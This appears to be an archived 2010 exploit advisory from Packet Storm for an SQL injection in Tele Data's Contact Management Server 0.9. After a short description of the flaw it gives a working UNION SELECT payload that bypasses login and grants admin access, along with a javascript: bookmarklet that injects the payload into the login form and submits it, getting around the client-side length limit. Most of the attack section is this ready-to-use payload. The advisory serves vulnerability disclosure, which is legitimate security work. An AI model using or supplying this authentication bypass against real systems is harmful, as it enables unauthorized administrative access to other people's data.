Tele Data's CMS 0.9 SQL Injection

2010-04-28T00:00:00
ID PACKETSTORM:89023
Type packetstorm
Reporter AutoSec Tools
Modified 2010-04-28T00:00:00

Description

                                        
                                            `|=================================================================================================|  
| ___ ___ ___ ___ ___ ___ |  
| /\ \ /\ \ /\__\ ___ /\ \ /\ \ /\ \ |  
| /::\ \ /::\ \ /::| | /\ \ /::\ \ /::\ \ /::\ \ |  
| /:/\:\ \ /:/\:\ \ /:|:| | \:\ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ |  
| /:/ \:\ \ /:/ \:\ \ /:/|:| |__ /::\__\ /::\~\:\ \ /::\~\:\ \ /::\~\:\ \ |  
| /:/__/ \:\__\ /:/__/ \:\__\ /:/ |:| /\__\ __/:/\/__/ /:/\:\ \:\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ |  
| \:\ \ \/__/ \:\ \ /:/ / \/__|:|/:/ / /\/:/ / \/__\:\ \/__/ \:\~\:\ \/__/ \/_|::\/:/ / |  
| \:\ \ \:\ /:/ / |:/:/ / \::/__/ \:\__\ \:\ \:\__\ |:|::/ / |  
| \:\ \ \:\/:/ / |::/ / \:\__\ \/__/ \:\ \/__/ |:|\/__/ |  
| \:\__\ \::/ / /:/ / \/__/ \:\__\ |:| | |  
| \/__/ \/__/ \/__/ \/__/ \|__| |  
| |  
|=================================================================================================|  
| |  
| Vulnerability............SQL Injection |  
| Software.................Tele Data's Contact Management Server 0.9 |  
| Download.................http://teledata.qc.ca/td_cms/TD_CMS_SETUPEX.exe |  
| Date.....................4/28/10 |  
| |  
|=================================================================================================|  
| |  
| Site.....................http://cross-site-scripting.blogspot.com/ |  
| Email....................john.leitch5@gmail.com |  
| |  
|=================================================================================================|  
|  
| ##Description##  
|  
| There isn't much in the way of security here. It's possible to log in with admin priviledges by  
| injecting SQL into the username field. As there are client side length contstraints in place for  
| the username field I packaged the exploit in some javascript for ease of use.  
|  
|  
| ##Exploit##   
|  
| ' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--  
|  
|  
| ##Proof of Concept##   
|  
| javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();  
|  
|=================================================================================================|  
`